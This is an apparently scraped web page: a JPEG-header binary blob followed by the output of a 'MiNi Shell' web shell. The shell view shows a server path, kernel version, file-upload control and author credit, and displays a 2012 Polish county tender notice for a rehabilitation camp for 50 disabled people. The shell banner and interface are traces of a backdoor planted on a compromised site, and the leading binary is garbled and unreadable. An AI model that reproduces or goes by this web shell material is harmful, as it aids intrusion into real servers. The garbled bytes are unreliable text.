JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20120417/

Linux 9dbcd5f6333d 5.15.0-102-generic #112-Ubuntu SMP Tue Mar 5 16:50:32 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20120417/86323-N-2012.html

<p class="kh_header"><b>Końskie: Zorganizowanie 14 - dniowego Obozu Rekreacyjnego 
dla 50 niepełnosprawnych Uczestników Projektu i 10 opiekunów, 
usprawniającego psychoruchowo, połączonego z kursem zdrowego żywienia.</b><br>
<b>Numer ogłoszenia: 86323 - 2012; data zamieszczenia: 17.04.2012</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Powiat Konecki , ul. Staszica 2, 26-200 Końskie, woj. świętokrzyskie, tel. 0-41 372 41 34, faks 0-41 372 83 20.</p>
<ul class="kh_indent_1">
</ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Zorganizowanie 14 - dniowego Obozu Rekreacyjnego 
dla 50 niepełnosprawnych Uczestników Projektu i 10 opiekunów, 
usprawniającego psychoruchowo, połączonego z kursem zdrowego żywienia..</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> 1.	Przedmiotem zamówienia jest usługa polegająca na: 
zorganizowaniu i przeprowadzeniu w miejscowości atrakcyjnej turystycznie położonej na terenie Polski w odległości nie większej niż 600 km od Końskich, 14-dniowego całodobowego Obozu Rekreacyjnego dla 50 niepełnosprawnych Uczestników Projektu My samodzielni oraz 10 opiekunów, usprawniającego psychoruchowo, połączonego z kursem zdrowego żywienia.
W ramach kursu zdrowego żywienia każdy z 50 niepełnosprawnych Uczestników Obozu objęty zostanie indywidualną konsultacją dietetyczną (1 h/os.), mającą na celu zebranie informacji o zwyczajach żywieniowych, trybie życia, dolegliwościach oraz zostanie sporządzona analiza składu ciała w celu ułożenia indywidualnej diety dla konkretnego pacjenta. Ponadto w ramach kursu zdrowego żywienia, odbędą się zajęcia grupowe (łączna liczba godzin  - 11 h) podczas których poruszone zostaną następujące zagadnienia:
- Jak racjonalnie i zdrowo komponować swoje posiłki,
- Jak czytać etykiety podczas robienia zakupów,
- Na co zwracać uwagę podczas jedzenia na mieście,
- Jak odżywiać się, nie stwarzając problemów z metabolizmem.
Liczba osób na zajęciach grupowych nie może przekroczyć 25.
2.	Uczestnikami Obozu będą osoby dorosłe o następujących schorzeniach: dysfunkcja narządu ruchu, w tym 1 osoba poruszająca się na wózku inwalidzkim, choroby układu moczowo - płciowego, choroby układu oddechowego, choroby psychiczne, neurologiczne, choroby układu pokarmowego, narządu wzroku, epilepsja, upośledzenie umysłowe, inne schorzenia, w tym onkologiczne.
3.	Wymagany termin realizacji przedmiotu zamówienia: 
Wykonawca jest zobowiązany zrealizować 14 - dniowy Obóz w dowolnie wybranym przez siebie terminie od 01.07.2012 r. - 15.09.2012 r.
4.Wymagania kadrowe:
a)	kierownik posiadający doświadczenie w kierowaniu jednym obozem lub kolonią, w którym uczestniczyły osoby niepełnosprawne,
b)	specjalista ds. rehabilitacji ruchowej, specjalista ds. rekreacji, psycholog                           i animator, przy czy każda z tych osób posiada doświadczenie w pracy z osobami niepełnosprawnymi,
c)	2 trenerów, z których każdy posiada doświadczenie w przeprowadzeniu jednego treningu/szkolenia/ kursu z zakresu żywienia i/lub dietetyki, oraz każdy posiada doświadczenie w pracy z osobami niepełnosprawnymi,
d)	1 pielęgniarka, posiadającą uprawnienia zgodnie z ustawą z dnia 5 lipca 1996 r.     o zawodach pielęgniarki i położnej
5.	Wymogi Zamawiającego dotyczące realizacji przedmiotu zamówienia: 
a)	Wykonawca w ramach realizacji zamówienia zobowiązany jest zapewnić transport uczestników Obozu z Końskich do miejsca organizacji Obozu oraz przywóz do Końskich po zakończeniu Obozu. Przejazd autokarem/busem kat. LUX., nie starszym niż 5 lat, dostosowanym do przewozu osób poruszających się na wózku inwalidzkim. Zamawiający zastrzega sobie prawo do kontroli pojazdu przed rozpoczęciem podróży, przez odpowiednie służby kontroli. W razie wykazania przez organy kontroli niesprawności autokaru/busów, Wykonawca jest zobowiązany                   w ciągu 1 godziny do podstawienia pojazdów sprawnych/zastępczych. Transport uczestników turnusu powinien odbywać się w ciągu dnia,
b)	Wykonawca wyznaczy osobę odpowiedzialną za transport uczestników, która będzie obecna podczas wyjazdu na Obóz i w drodze powrotnej.
c)	W ramach zamówienia Wykonawca zapewni zakwaterowanie uczestników Obozu w ośrodku wczasowym bądź hotelu, co najmniej 3 gwiazdkowym, który poza pełnym zapleczem gastronomicznym, sanitarnym i rekreacyjnym spełnia następujące warunki:
- jest dostosowany do potrzeb osób niepełnosprawnych poruszających się na wózkach inwalidzkich,
- zakwaterowanie uczestników w pokojach 2 - osobowych z pełnym węzłem sanitarnym - wc i natryski w każdym pokoju (z całodobowym dostępem do ciepłej i zimnej wody),
- wyposażenie pokoi w jednoosobowe łóżka z pościelą, szafy ubraniowe, szafki przy łóżkach (wyklucza się łóżka piętrowe), TV,
- na terenie ośrodka wczasowego/hotelu znajduje się basen i sauna, z której mogą bezpłatnie korzystać uczestnicy wyjazdu w tzw. czasie wolnym, przy czym Wykonawca dokładnie określi godziny, w których uczestnicy będą mogli z nich korzystać,
- Wykonawca zapewni całodzienne wyżywienie składające się z trzech posiłków, w tym: śniadania (w formie szwedzkiego stołu), obiadu (składającego się z dwóch dań serwowanych do stolika) i kolacji (w formie szwedzkiego stołu), z zastrzeżeniem, że w dniu powrotu Wykonawca zapewni uczestnikom prowiant na czas podróży.
d)	Ośrodek wczasowy bądź hotel będzie położony w odległości nie większej niż 20 km od szpitala wyposażonego w Stację Dializ (jeden z Uczestników Obozu wymaga dializowania 3 razy w tygodniu),
e)	Wykonawca zapewni przeprowadzenie dwóch badań lekarskich 50 osób niepełnosprawnych - uczestników Obozu, przy czym pierwsze zakończone wskazaniem zabiegów leczniczych.
f)	Wykonawca zobowiązany jest do zapewnienia wszystkim uczestnikom Obozu codziennie bezpłatnych zajęć o charakterze sportowo-rekreacyjnym (np. zajęcia na siłowni, zajęcia fitness, zajęcia na basenie) i rozrywkowym  (ogniska, grillowanie, dyskoteki, zabawy z muzyką wraz z poczęstunkiem odpowiednim do typu imprezy) oraz dla każdego z 50 niepełnosprawnych uczestników Obozu - 1 zabiegu rehabilitacyjnego dziennie, zgodnie z zaleceniem lekarza.
g)	Wykonawca zobowiązany jest zabezpieczyć dla 50 uczestników obozu salę na terenie ośrodka do przeprowadzenia kursu zdrowego żywienia, wyposażoną                           w sprzęt niezbędny do prowadzenia kursu. Sala powinna być klimatyzowana, mieścić min. 25 osób,
h)	Wykonawca podczas trwania obozu zorganizuje jedną jednodniową wycieczkę autokarową uwzględniającą atrakcje kulturalne, architektoniczne i przyrodnicze, Wykonawca zobowiązany jest podczas wycieczki zapewnić: opiekę pilota na całej trasie wyjazdu oraz lokalnych przewodników w trakcie zwiedzania; bilety wstępu do zwiedzanych obiektów oraz pokryć inne koszty, niezbędne do prawidłowego przebiegu wyjazdu.
i)	Wykonawca poniesie koszty opłaty uzdrowiskowej/klimatycznej za wszystkich uczestników Obozu  i opiekunów, jeśli wymagać będzie tego lokalizacja hotelu/ośrodka, 
j)	Wykonawca opłaci ubezpieczenie NNW dla każdego uczestnika Obozu i opiekuna na kwotę 10.000 zł na jedną osobę, obejmujące: dojazd uczestników Obozu                         z miejscowości Końskie do miejsca odbywania się Obozu, dojazd z miejsca odbywania się Obozu do miejscowości Końskie oraz całodobowy 14-dniowy pobyt na Obozie,
k)	Wykonawca ponosi pełną odpowiedzialność za bezpieczeństwo uczestników Obozu, od momentu wyjazdu do czasu powrotu,
r)	Wykonawca zapewni warunki zgodnie z przepisami bezpieczeństwa i higieny pracy                    w trakcie kursu zdrowego żywienia,
s)	Wykonawca oznaczy miejsca, z których korzystać będą uczestnicy Obozu poprzez umieszczenie informacji dotyczących projektu oraz współfinansowania przez Unię Europejską (przekazanych przez Zamawiającego),
t)	Wykonawca zobowiązany jest przeprowadzić ankiety ewaluacyjne wśród uczestników Obozu, zgodnie z przekazanym przez Zamawiającego wzorem,                      i przekazać je Zamawiającemu po zakończeniu realizacji zadania,
u)	Wykonawca będzie prowadził dokumentację przebiegu Obozu oraz kursu zdrowego żywienia, tj.: dziennik zajęć i listy obecności oraz sporządzi dokumentację fotograficzną, którą przekaże Zamawiającemu po zakończeniu Obozu,
v)	Zamawiający zastrzega sobie prawo kontroli w zakresie realizacji przedmiotu zamówienia..</p>
<p><b>II.1.4) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p>

<p><b>II.1.5) Wspólny Słownik Zamówień (CPV):</b> 63.50.00.00-4.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 15.09.2012.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> Zamawiający nie wymaga wniesienia wadium.</p>
<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>Czy przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> nie</li></ul>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający uzna ww. warunek za spełniony jeżeli wykonawca wykaże, że w okresie ostatnich trzech lat przed upływem terminu składania ofert, a jeśli okres prowadzenia działalności jest krótszy - w tym okresie, wykonał co najmniej dwie usługi, z których każda polegała na zorganizowaniu                                i przeprowadzeniu kolonii lub obozu dla minimum 30 niepełnosprawnych uczestników .
Zamawiający dokona oceny spełniania przez Wykonawcę warunków udziału w postępowaniu na zasadzie spełnia/nie spełnia.</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający uzna w/w warunek za spełniony, jeżeli Wykonawca wykaże, że dysponuje lub będzie dysponował następującymi osobami: 
a.	kierownikiem, posiadającym doświadczenie w kierowaniu jednym obozem lub kolonią,                   w którym uczestniczyły osoby niepełnosprawne,
b.	specjalistą ds. rehabilitacji ruchowej, specjalistą ds. rekreacji, psychologiem i animatorem, przy czy każda z tych osób posiada doświadczenie w pracy z osobami niepełnosprawnymi, 
c.	2 trenerami, z których każdy posiada doświadczenie w przeprowadzeniu jednego treningu/ szkolenia/ kursu z zakresu żywienia i/lub dietetyki, oraz każdy posiada doświadczenie w pracy z osobami niepełnosprawnymi, 
d.	1 pielęgniarką, posiadającą uprawnienia zgodnie z ustawą z dnia 5 lipca 1996 r. o zawodach pielęgniarki i położnej
Zamawiający dokona oceny spełniania przez Wykonawcę warunków udziału w postępowaniu na zasadzie spełnia/nie spełnia</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<ul class="kh_indent_1"><li>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz wykonanych, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych, dostaw lub usług  w zakresie niezbędnym do wykazania spełniania warunku wiedzy i doświadczenia w okresie ostatnich trzech lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, z podaniem ich wartości, przedmiotu, dat wykonania i odbiorców, oraz załączeniem dokumentu potwierdzającego, że te dostawy lub usługi zostały wykonane lub są wykonywane należycie</li>

<li  style="margin-bottom: 12px;">wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych dla wykonania zamówienia, a także zakresu wykonywanych przez nie czynności, oraz informacją o podstawie do dysponowania tymi osobami</li>

</ul></li>

<li><p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru, jeżeli odrębne przepisy wymagają wpisu do rejestru, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert, a w stosunku do osób fizycznych oświadczenie w zakresie art. 24 ust. 1 pkt 2 ustawy</li>

</ul></li>
<li>
<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
</ul>
<p class="bold">III.6) INNE DOKUMENTY</p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>Oświadczenie o spełnianiu warunków udziału w postępowaniu określonych w art. 22 ust. 1 ustawy - sporządzone według wzoru stanowiącego Załącznik Nr 3 do SIWZ.</p>
<p><b>III.7) Czy ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne: </b>nie</p>


<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.2.2) Czy przeprowadzona będzie aukcja elektroniczna:</b> nie.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b>tak</p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>Zamawiający dopuszcza możliwość zmiany umowy w zakresie:
-terminów realizacji zamówienia - w sytuacji wystąpienia zdarzeń natury losowej tj. zdarzeń nagłych, zewnętrznych, które są niezależne od Zamawiającego i Wykonawcy, które stanowią przeszkodę w realizacji umowy wg pierwotnego terminu, a których nie można było przewidzieć, ani im zapobiec (siła wyższa),
-osób, które będą uczestniczyć w wykonywaniu zamówienia (wskazanych w ofercie Wykonawcy), pod warunkami określonymi w § 4 ust. 2 wzoru umowy,
-wysokości wynagrodzenia Wykonawcy za realizację przedmiotu umowy - w przypadkach określonych w § 5 ust. 2 wzoru umowy.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> bip.konecki.wrota-swietokrzyskie.pl/web/quest/pcpr<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Powiatowe Centrum Pomocy Rodzinie w Końskich, ul. Stanisława Staszica 2, 26-200 Końskie pok. Nr 4.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 25.04.2012 godzina 10:00, miejsce: Powiatowym Centrum Pomocy Rodzinie w Końskich, ul. Stanisława Staszica 2, 26-200 Końskie pok. Nr 4.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>




<p><b>IV.4.16) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> Projekt systemowy realizowany w ramach Programu Operacyjnego Kapitał Ludzki, Priorytet VII Promocja Integracji społecznej, Poddziałanie 7.1.2 Rozwój i upowszechnianie  aktywnej integracji przez powiatowe centra pomocy rodzinie..</p>
<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com